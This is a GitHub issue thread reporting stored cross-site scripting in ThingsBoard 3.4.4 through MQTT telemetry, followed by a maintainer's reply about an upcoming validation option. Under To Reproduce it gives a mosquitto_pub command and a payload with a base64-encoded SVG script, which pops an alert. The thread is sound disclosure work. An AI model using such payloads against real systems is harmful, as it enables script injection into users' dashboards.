### ISSUE TITLE
[Bug] XSS from mqtt message

### ISSUE THREAD

**Issue by TheCTRL** [thingsboard/thingsboard#8467]
**Describe the bug**
It's possible to send an mqtt message with a specific payload and execute js (XSS attack).

**Your Server Environment**
  * local 
  * ThingsBoard 3.4.4
  * Debian 11

**Your Client Environment**
MacOS Ventura 13.3.1
Debian 11

* OS: 
* Chrome 112.0.5615.137
* Safari 16.4 (18615.1.26.11.23)
* Firefox 112.0.2

**Your Device**
mosquitto_pub

* Connectivity
  * MQTT

**To Reproduce**
mosquitto_pub -d -q 1 -h "192.168.2.173" -t "v1/devices/me/telemetry" -u "mytoken134243" -f payload.json

payload.json: {"wifi-signal": '200 <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIl5 DIHdhcyBoZXJlIik7PC9zY3JpcHQ+PC9zdmc+Cg==" type="image/svg+xml" AllowScriptAccess="always">'}

**Expected behavior**
Based on the payload above, display only 200. Validate user input and trim away html/js 

**Screenshots**
I've uploaded a video here
https://github.com/TheCTRL/thingsboard-3.4.4-xss

**Additional context**
None

**Comment by TheCTRL** [comment]
github correctly deleted part of the payload in my previous comment, please refer to the link provided

**Comment by ban2derlog** [comment]
Hi,
In next release 3.5.2 there will be optional toggle parameter for validation.
ThingsBoard can't force set validation, because this will reject any XML payload from devices.
